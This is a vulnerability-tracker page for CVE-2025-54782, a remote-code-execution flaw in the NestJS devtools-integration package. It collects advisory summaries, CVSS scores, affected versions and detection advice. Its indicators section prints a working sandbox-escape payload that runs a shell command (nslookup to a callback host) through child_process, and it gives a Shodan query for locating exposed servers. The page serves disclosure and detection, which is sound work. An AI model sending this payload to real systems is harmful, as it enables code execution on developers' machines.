CVE-2025-54782
published 2025-08-02CVE-2025-54782: Nest is a framework for building scalable Node.js server-side applications. In versions 0.2.0 and below, a critical Remote Code Execution (RCE) vulnerability…
PriorityP188high8.8CVSS 3.1
AVNACLPRNUIRSUCHIHAH
ITWEXPLOITVulnCheck KEVInitial access
Exploited in the wild
EPSS
46.17%
98.7th percentile
Nest is a framework for building scalable Node.js server-side applications. In versions 0.2.0 and below, a critical Remote Code Execution (RCE) vulnerability was discovered in the @nestjs/devtools-integration package. When enabled, the package exposes a local development HTTP server with an API endpoint that uses an unsafe JavaScript sandbox (safe-eval-like implementation). Due to improper sandboxing and missing cross-origin protections, any malicious website visited by a developer can execute arbitrary code on their local machine. The package adds HTTP endpoints to a locally running NestJS development server. One of these endpoints, /inspector/graph/interact, accepts JSON input containing a code field and executes the provided code in a Node.js vm.runInNewContext sandbox. This is fixed in version 0.2.1.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| nestjs | devtools-integration | < 0.2.1 | 0.2.1 |
| nestjs | devtools-integration | >= 0 < 0.2.1 | 0.2.1 |
| nestjs | nest | < 0.2.1 | 0.2.1 |
Detection & IOCsextracted from sources · hover to see the quote
commandPOST /inspector/graph/interact HTTP/1.1
Host: {{Hostname}}
Content-Type: text/plain
{"code":"(function(){try{propertyIsEnumerable.call()}catch(pp){pp.constructor.constructor('return process')().mainModule.require('child_process').execSync('nslookup {{interactsh-url}}')}})()"}
othershodan-query: "devtools.nestjs.com"
- →Monitor for POST requests to /inspector/graph/interact on locally running NestJS development servers; the endpoint accepts a JSON body with a 'code' field for arbitrary execution. ↗
- →Detect sandbox escape pattern using propertyIsEnumerable.call() to obtain constructor chain and reach process.mainModule.require('child_process') within the vm.runInNewContext sandbox.
- →Requests to /inspector/graph/interact with Content-Type: text/plain returning HTTP 200 and application/plain content-type in response are indicative of successful exploitation.
- →Use Shodan query 'devtools.nestjs.com' to identify internet-exposed NestJS DevTools integration servers vulnerable to this RCE.
- →The vulnerability is present in @nestjs/devtools-integration versions 0.2.0 and below; flag any deployment of these versions with the devtools integration enabled. ↗
- ·The vulnerable endpoint is only exposed when the @nestjs/devtools-integration package is explicitly enabled in a NestJS application, typically only in local development environments — not in production by default. ↗
- ·Exploitation can be triggered cross-origin (CSRF-style) by any malicious website visited by the developer, due to missing cross-origin protections — no direct network access to the developer machine is required. ↗
CVSS provenance
nvdv3.18.8HIGHCVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
nvdv4.09.4CRITICALCVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
vulncheck9.4CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
@nestjs/devtools-integration: CSRF to Sandbox Escape Allows for RCE against JS Developers
ghsa·2025-08-01
CVE-2025-54782 [CRITICAL] CWE-352 @nestjs/devtools-integration: CSRF to Sandbox Escape Allows for RCE against JS Developers
@nestjs/devtools-integration: CSRF to Sandbox Escape Allows for RCE against JS Developers
## Summary
A critical Remote Code Execution (RCE) vulnerability was discovered in the `@nestjs/devtools-integration` package. When enabled, the package exposes a local development HTTP server with an API endpoint that uses an unsafe JavaScript sandbox (`safe-eval`-like implementation). Due to improper sandboxing and missing cross-origin protections, any malicious website visited by a developer can execute arbitrary code on their local machine.
A full blog post about how this vulnerability was uncovered can be found on [Socket's blog](https://socket.dev/blog/nestjs-rce-vuln).
## Details
The `@nestjs/devtools-integration` package adds HTTP endpoints to a locally running NestJS development server. One
OSV
@nestjs/devtools-integration: CSRF to Sandbox Escape Allows for RCE against JS Developers
osv·2025-08-01
CVE-2025-54782 [CRITICAL] @nestjs/devtools-integration: CSRF to Sandbox Escape Allows for RCE against JS Developers
@nestjs/devtools-integration: CSRF to Sandbox Escape Allows for RCE against JS Developers
## Summary
A critical Remote Code Execution (RCE) vulnerability was discovered in the `@nestjs/devtools-integration` package. When enabled, the package exposes a local development HTTP server with an API endpoint that uses an unsafe JavaScript sandbox (`safe-eval`-like implementation). Due to improper sandboxing and missing cross-origin protections, any malicious website visited by a developer can execute arbitrary code on their local machine.
A full blog post about how this vulnerability was uncovered can be found on [Socket's blog](https://socket.dev/blog/nestjs-rce-vuln).
## Details
The `@nestjs/devtools-integration` package adds HTTP endpoints to a locally running NestJS development server. One
VulnCheck
nestjs devtools-integration Improper Neutralization of Special Elements used in a Command ('Command Injection')
vulncheck·2025·CVSS 9.4
CVE-2025-54782 [CRITICAL] nestjs devtools-integration Improper Neutralization of Special Elements used in a Command ('Command Injection')
nestjs devtools-integration Improper Neutralization of Special Elements used in a Command ('Command Injection')
Nest is a framework for building scalable Node.js server-side applications. In versions 0.2.0 and below, a critical Remote Code Execution (RCE) vulnerability was discovered in the @nestjs/devtools-integration package. When enabled, the package exposes a local development HTTP server with an API endpoint that uses an unsafe JavaScript sandbox (safe-eval-like implementation). Due to improper sandboxing and missing cross-origin protections, any malicious website visited by a developer can execute arbitrary code on their local machine. The package adds HTTP endpoints to a locally running NestJS development server. One of these endpoints, /inspector/graph/interact, accepts JSON input
No detection rules found.
Nuclei
NestJS DevTools Integration - Remote Code Execution
nuclei·CVSS 9.4
CVE-2025-54782 [CRITICAL] NestJS DevTools Integration - Remote Code Execution
NestJS DevTools Integration - Remote Code Execution
Nest is a framework for building scalable Node.js server-side applications. In versions 0.2.0 and below, a critical Remote Code Execution (RCE) vulnerability was discovered in the @nestjs/devtools-integration package. When enabled, the package exposes a local development HTTP server with an API endpoint that uses an unsafe JavaScript sandbox (safe-eval-like implementation). Due to improper sandboxing and missing cross-origin protections, any malicious website visited by a developer can execute arbitrary code on their local machine. The package adds HTTP endpoints to a locally running NestJS development server. One of these endpoints, /inspector/graph/interact, accepts JSON input containing a code field and executes the provided code in a
No writeups or analysis indexed.
https://github.com/JLLeitschuh/nestjs-devtools-integration-rce-pochttps://github.com/JLLeitschuh/nestjs-typescript-starter-w-devtools-integrationhttps://github.com/nestjs/nest/security/advisories/GHSA-85cg-cmq5-qjm7https://nodejs.org/api/vm.htmlhttps://socket.dev/blog/nestjs-rce-vulnhttps://github.com/nestjs/nest/security/advisories/GHSA-85cg-cmq5-qjm7
2025-08-02
Published
Exploited in the wild